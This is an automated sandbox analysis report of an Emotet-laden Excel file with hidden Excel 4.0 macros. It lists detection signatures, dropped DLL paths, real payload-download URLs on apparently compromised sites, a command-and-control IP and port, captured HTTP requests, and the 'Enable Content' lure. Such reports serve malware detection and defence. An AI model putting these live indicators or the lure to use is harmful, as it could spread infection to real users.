Windows Analysis Report
DETAILS 25922194612.xls

Overview

General Information

Sample Name: DETAILS 25922194612.xls
Analysis ID: 632071
MD5: 3cfaa4009799dc19f12161241bbf7b03
SHA1: f36b5b095c84f4cf7e01eaf23de008a3362843a8
SHA256: 96eaa313abb56196eea9e8c4c20f78166b79894652e1cff740729d17aace22f0
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0, Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: DETAILS 25922194612.xls ReversingLabs: Detection: 41%
Source: http://learnviaonline.com/wp-admin/qGb/ Avira URL Cloud: Label: malware
Source: http://milanstaffing.com/images/D4TRnDubF/ Avira URL Cloud: Label: malware
Source: http://kolejleri.com/wp-admin/REvup/ Avira URL Cloud: Label: malware
Source: kolejleri.com Virustotal: Detection: 11%
Source: milanstaffing.com Virustotal: Detection: 6%
Source: learnviaonline.com Virustotal: Detection: 8%
Source: stainedglassexpress.com Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Metadefender: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr1.ocx ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr2.ocx ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr3.ocx ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr4.ocx Metadefender: Detection: 28%
Source: C:\Users\user\uxevr4.ocx ReversingLabs: Detection: 60%
Source: C:\Windows\System32\Ejpzh\qlDqXeGagKnBKzd.dll (copy) ReversingLabs: Detection: 58%
Source: C:\Windows\System32\FiPeSYwmr\Wuiko.dll (copy) ReversingLabs: Detection: 58%
Source: C:\Windows\System32\KuSAkvGE\rWFJGQNl.dll (copy) ReversingLabs: Detection: 58%
Source: C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy) Metadefender: Detection: 28%
Source: C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy) ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\uxevr3.ocx Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\uxevr1.ocx Joe Sandbox ML: detected
Source: C:\Users\user\uxevr4.ocx Joe Sandbox ML: detected
Source: C:\Users\user\uxevr2.ocx Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 4_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 7_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 9_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 11_2_000000018000BEF0

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: Jf8[1].dll.0.dr
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic DNS query: name: learnviaonline.com
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 103.171.181.223:80

Networking

Source: C:\Windows\System32\regsvr32.exe Network Connect: 165.22.73.229 8080
Source: Joe Sandbox View ASN Name: MYLOC-ASIPBackboneofmyLocmanagedITAGDE
Source: Joe Sandbox View IP Address: 103.171.181.223
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:10:53 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:10:53 GMTContent-Disposition: attachment; filename="Jf8.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b337ddc562=1653289853; expires=Mon, 23-May-2022 07:11:53 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:10:53 GMTContent-Length: 371200Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:11:01 GMTServer: ApacheX-Powered-By: PHP/7.3.33Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:11:01 GMTContent-Disposition: attachment; filename="1Cb5zOjLgWGDemz55C5.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b3385b2519=1653289861; expires=Mon, 23-May-2022 07:12:01 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:11:01 GMTContent-Length: 371200X-Content-Type-Options: nosniffVary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.0.33set-cookie: 628b33891c2fb=1653289865; expires=Mon, 23-May-2022 07:12:05 GMT; Max-Age=60; path=/cache-control: no-cache, must-revalidatepragma: no-cachelast-modified: Mon, 23 May 2022 07:11:05 GMTexpires: Mon, 23 May 2022 07:11:05 GMTcontent-type: application/x-msdownloadcontent-disposition: attachment; filename="T35PENELLOsp.dll"content-transfer-encoding: binarycontent-length: 371200date: Mon, 23 May 2022 07:11:05 GMTserver: LiteSpeedvary: User-Agent
Source: global traffic HTTP traffic detected: GET /wp-admin/qGb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: learnviaonline.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/REvup/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kolejleri.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stainedglassexpress.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/D4TRnDubF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: milanstaffing.comConnection: Keep-Alive
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 165.22.73.229:8080
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219171060.0000000000368000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219212394.00000000004C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: regsvr32.exe, 0000000B.00000002.1219557119.0000000002CE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmeroZe
Source: regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enP
Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enR
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/
Source: regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/5v
Source: regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/=v
Source: regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/KP
Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/l
Source: regsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/
Source: regsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/.t
Source: regsvr32.exe, 0000000B.00000002.1219557119.0000000002CE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/1o
Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/L
Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/h
Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
Source: unknown DNS traffic detected: queries for: learnviaonline.com
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180017C8C InternetReadFile, 4_2_0000000180017C8C
Source: global traffic HTTP traffic detected: GET /wp-admin/qGb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: learnviaonline.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/REvup/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kolejleri.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stainedglassexpress.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/D4TRnDubF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: milanstaffing.comConnection: Keep-Alive

E-Banking Fraud

Source: Yara match File source: 10.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.regsvr32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.regsvr32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.1219777301.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1218923490.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.935437838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.950850615.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.935123835.00000000003E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.944087304.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1219645231.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1218912030.0000000000150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1218942103.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.951348566.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.926422500.0000000000300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.943168453.00000000002D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1218930467.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1219706572.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: Screenshot number: 4 Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
